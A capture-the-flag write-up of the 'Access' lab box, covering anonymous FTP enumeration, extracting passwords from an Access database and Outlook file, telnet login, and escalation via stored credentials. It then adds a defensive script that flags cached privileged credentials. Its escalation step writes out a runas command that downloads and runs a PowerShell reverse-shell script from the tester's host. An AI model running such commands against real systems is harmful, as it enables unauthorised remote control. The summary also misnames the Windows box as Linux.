Summary

Access is an easy Linux box that can be exploited by enumerating the FTP server and finding two useful files. After decrypting the backup.mdb you will find credentials that can be used to unzip an archive. This archive contains a .pst file which contains an email with credentials. These credentials were then used to authenticate to the Telnet Server. Privileges were escalated by abusing runas and obtaining an Administrative shell.
This is a manual walkthrough without using Metasploit.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.105.253

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5

Nmap showed that FTP is used and anonymous login is allowed. The FTP directory contained the following files:

08-23-18  08:16PM       DIR          Backups
08-23-18  08:16PM              5652480 backup.mdb
08-24-18  09:00PM       DIR          Engineer
08-24-18  12:16AM                10870 Access Control.zip

Both were downloaded with get. The zip file requires credentials, so I checked backup.mdb first. This is a Microsoft Access database file. To gather information from it you will have to install mdbtools:

sudo apt install mdbtools

mdb-tables backup.mdb

This will produce a lot of tables, so let’s filter for interesting ones with user in them:

mdb-tables backup.mdb | grep -i user

I checked the interesting ones and the following table contained creds:

mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

Obtaining Credentials

None of these work to obtain an authenticated FTP session so it made sense to try and use them to unzip the file that was obtained earlier. This also makes sense since you have an engineer account and the .zip was in the engineer folder. To unzip, use:

7z x -paccess4u@security Access\ Control.zip

This will create a file named Access Control.pst. The .pst file is an Outlook data file. Since I don't have Outlook on Kali Linux to import it, I used readpst to export it:

readpst Access\ Control.pst

You can now read the email message:

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,

John

Authenticated Telnet Shell

Sweet, so we obtained a new account. Since the webserver does not contain any sort of login page and the credentials didn’t work with FTP, it made sense that the telnet port must be used for authentication. The following command was used to authenticate over telnet at port 23:

telnet 10.129.109.204 23
Trying 10.129.109.204...
Connected to 10.129.109.204.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security

Great, you now have a lower privileged shell as the security user. From here you have access to the user.txt.


Privilege Escalation

You should always run this command to check if any credentials are stored:

cmdkey /list 

PS C:\Users\security> cmdkey /list 

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator

Sweet, in this case there are. This allows for an easy privilege escalation, since runas with /savecred will run an executable as the stored user. Start your Python web server and run the following command:

runas /user:ACCESS\Administrator /savecred "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.147/Invoke-PowerShellTcp.ps1')"

This runs PowerShell, which downloads and invokes the PowerShell reverse shell script from your web server, giving you a new reverse shell as Administrator:

Windows PowerShell running as user Administrator on ACCESS
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>PS C:\Windows\system32> 
PS C:\Windows\system32> whoami
access\administrator
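The stored interactive credential shown by cmdkey /list above is the misconfiguration that made this escalation possible. As an added example (not part of the original writeup), the following Python script parses cmdkey /list output, here a constructed sample modelled on the session plus two benign entries, and flags stored interactive Domain Password entries for privileged accounts, which is the audit a defender would run across hosts.

```python
import re

# Constructed sample of `cmdkey /list` output, modelled on the session in
# this writeup with two harmless entries added. Not a capture from the box.
SAMPLE_CMDKEY_OUTPUT = """
Currently stored credentials:

    Target: Domain:interactive=ACCESS\\Administrator
    Type: Domain Password
    User: ACCESS\\Administrator

    Target: LegacyGeneric:target=git:https://github.com
    Type: Generic
    User: devuser

    Target: Domain:target=fileserver.access.local
    Type: Domain Password
    User: ACCESS\\security
"""

# Accounts whose password should never be cached for interactive reuse.
PRIVILEGED_USERS = {"administrator", "domain admins", "enterprise admins"}


def parse_cmdkey(output):
    """Split cmdkey /list output into dicts with target/type/user keys."""
    entries, current = [], {}
    for line in output.splitlines():
        m = re.match(r"\s*(Target|Type|User):\s*(.*)$", line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "target" and current:  # a new Target starts a new entry
            entries.append(current)
            current = {}
        current[key] = value
    if current:
        entries.append(current)
    return entries


def flag_risky(entries):
    """Return entries that a runas /savecred style reuse could abuse: an
    interactive Domain Password stored for a privileged account."""
    risky = []
    for e in entries:
        user = e.get("user", "").split("\\")[-1].lower()
        interactive = e.get("target", "").lower().startswith("domain:interactive=")
        if e.get("type") == "Domain Password" and interactive and user in PRIVILEGED_USERS:
            risky.append(e)
    return risky


if __name__ == "__main__":
    for e in flag_risky(parse_cmdkey(SAMPLE_CMDKEY_OUTPUT)):
        print("RISKY stored credential:", e["target"], "->", e["user"])
```

On a real host, feed it the output of `cmdkey /list` run as each local user, since stored credentials are per-user.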

Conclusion

I quite enjoyed this box; the path was very straightforward since the attack vectors were limited. This was a pretty easy box. I hope you learned something and enjoyed the writeup!